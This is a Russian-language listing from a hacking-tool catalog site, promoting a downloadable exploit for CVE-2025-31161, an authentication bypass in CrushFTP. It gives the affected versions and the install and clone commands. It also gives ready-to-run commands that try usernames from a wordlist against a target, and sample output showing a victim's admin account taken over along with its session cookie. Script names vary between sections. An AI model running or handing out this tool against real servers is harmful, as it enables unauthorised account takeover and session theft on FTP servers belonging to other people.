Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-31161 — CrushFTP CVE-2025-31161 Эксплойт-инструмент 🔓 | Kitploit
Инструменты/GitHubGitHub/tx-one/cve-2025-31161
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеАутентификация
GitHubtx-one/cve-2025-31161

CVE-2025-31161

CrushFTP CVE-2025-31161 Эксплойт-инструмент 🔓

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CrushFTP CVE-2025-31161 Инструмент эксплуатации 🔓

Расширенный инструмент для обнаружения и эксплуатации уязвимости CVE-2025-31161 в уязвимых версиях CrushFTP.

CVE-2025-31161 является критической уязвимостью обхода аутентификации в веб-интерфейсе CrushFTP. Манипулируя HTTP-заголовком Authorization, неаутентифицированный злоумышленник может получить полный доступ под любым допустимым именем пользователя, не вводя правильный пароль.

Затронутые версии

CrushFTP 9.3.8

CrushFTP 9.3.9

CrushFTP 9.3.10

CrushFTP 9.3.11

CrushFTP 9.3.12

Версии CrushFTP Enterprise до 9.3.12.5

Ключевые возможности 🚀

  • Автоматическое определение версии CrushFTP и проверка уязвимости
  • Многопоточное тестирование учетных данных для быстрого перебора пользователей
  • Поддержка двух методов аутентификации (Bearer Token и Basic Auth)
  • Генерация JSON-отчетов с куки сессии
  • Умные механизмы повторных попыток подключения с настраиваемыми параметрами
  • Цветной вывод в консоль с подробным логированием
  • Покрытие уязвимых версий:
    • 9.3.8 по 9.3.12.5

Требования 📋

  • Python 3.8+

  • Необходимые пакеты:

    root@kitploit:~
    pip install requests colorama urllib3
    

    Установка 🛠️

  1. Установите зависимости:
root@kitploit:~
 pip install requests colorama urllib3
  1. Клонируйте репозиторий:
root@kitploit:~
 git clone https://github.com/TX-One/CVE-2025-31161.git
 cd CVE-2025-31161
 python3 tx-crush.py -h

Использование 🖥️

Основная команда:

root@kitploit:~
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json

Опции:

root@kitploit:~
-h, --help            show this help message and exit
  -t, --target TARGET   Target URL (e.g., https://example.com:8080)
  -u, --users USERS     File containing username list
  -o, --output OUTPUT   Output JSON file
  -T, --threads THREADS
                        Number of threads (default: 5)
  --no-ssl              Disable SSL verification
  --timeout TIMEOUT     Request timeout (default: 15)
  --retries RETRIES     Number of retries (default: 3)
  --force               Bypass version check

Продвинутый пример:

root@kitploit:~
python3 exploit.py
  -t https://vulnerable-server.com:8000
  -u ./wordlists/common_users.txt
  -o ./results/compromised.json
  -T 10
  --retries 5
  --timeout 20

Пример вывода 📄

root@kitploit:~
[
  {
    "target": "https://victim:8080",
    "user": "admin",
    "success": true,
    "method": "Bearer",
    "cookies": {"sessionID": "a1b2c3..."},
    "server_version": "CrushFTP/9.3.12"
  }
]
root@kitploit:~
[
  {
        "target": "http://victim:8080",
        "user": "admin",
        "success": false
    }
]

Отказ от ответственности: Данный проект предназначен только для образовательных целей и исследований в области безопасности. Требуется ответственное использование.

Скачать инструмент